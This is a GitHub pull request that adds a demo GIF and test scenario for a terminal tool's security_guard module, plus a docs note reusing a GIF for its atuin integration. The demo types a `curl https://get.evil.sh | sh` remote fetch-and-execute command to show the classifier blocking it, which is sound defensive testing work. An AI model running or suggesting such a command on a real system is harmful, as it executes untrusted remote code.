feat(demo): security_guard subset GIF plus atuin docs note#545
Merged
Conversation
…t demo - tests/demo/security_guard/ — the in-proc Tier-1 classifier catches a `curl … | sh` remote-fetch-and-execute and arms the [y]/[a]/[t]/[B] banner before it runs, with NO atty-guard daemon (empty daemon_socket_path → the bundled pattern set runs in-process). docs/assets/atty-security-guard.gif on the module page. Frame-verified; footer visible; OSC 7 stripped. - docs/modules/atuin.md: embed the shipped ghost GIF with a note that atuin's ghost-text UX is identical (same suggestions from the Atuin DB) — a dedicated atuin recording needs a seeded database, tracked as a follow-up. Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
There was a problem hiding this comment.
Pull request overview
Adds the final per-feature demo recording for the security_guard module and wires it into the docs, plus updates atuin docs to reuse the existing ghost-text GIF with an explanation instead of introducing a flaky Atuin-seeded recording.
Changes:
- Add a new
tests/demo/security_guard/e2e scenario + golden recording artifacts to generateatty-security-guard.gif. - Embed the new
security_guardGIF indocs/modules/security_guard.md. - Embed the existing ghost-text GIF in
docs/modules/atuin.mdwith a note explaining why it’s reused.
Reviewed changes
Copilot reviewed 5 out of 7 changed files in this pull request and generated 1 comment.
Show a summary per file
| File | Description |
|---|---|
| tests/demo/security_guard/scenario.e2e | New scripted demo scenario for the security_guard banner flow. |
| tests/demo/security_guard/golden/env.toml | Recorded demo environment metadata for reproducible casting. |
| tests/demo/security_guard/golden/cast.json | Golden asciinema cast backing the generated security_guard GIF. |
| tests/demo/security_guard/config.zig | Demo config enabling security_guard and status bar for recording. |
| docs/modules/security_guard.md | Embeds the new atty-security-guard.gif in module docs. |
| docs/modules/atuin.md | Reuses atty-ghost.gif and documents why a dedicated Atuin recording is deferred. |
Files not reviewed (1)
- tests/demo/security_guard/golden/cast.json: Generated file
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
- security_guard config: set daemon_socket_path = "" explicitly (Copilot) so the in-proc Tier-1 intent is clear + robust to a default change. Same value as the default → behaviour + recorded cast unchanged. - atuin.md: link the deferred-atuin-recording follow-up (#546). Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
The last of the per-feature subset GIFs.
security_guard (new GIF)
tests/demo/security_guard/— typingcurl https://get.evil.sh | shand pressing Enter triggers the in-proc Tier-1 classifier (no atty-guard daemon —daemon_socket_pathis empty, so the bundled patterns run in-process). atty arms the banner:Frame-verified, footer visible, OSC 7 stripped. Embedded on
docs/modules/security_guard.md.atuin (deferred recording, docs note)
The
atuinghost-text UX is identical to the shipped shell-nativehistoryGIF — same dim suggestion + accept, just sourced from the Atuin DB. A dedicated atuin recording needs a seeded database (fiddly + flaky in the static pipeline), sodocs/modules/atuin.mdembeds the existing ghost GIF with a note rather than a separate, brittle recording.Still deferred
agg.Not in CI —
tests/demoruns only viazig build demo/make demo-gifs.🤖 Generated with Claude Code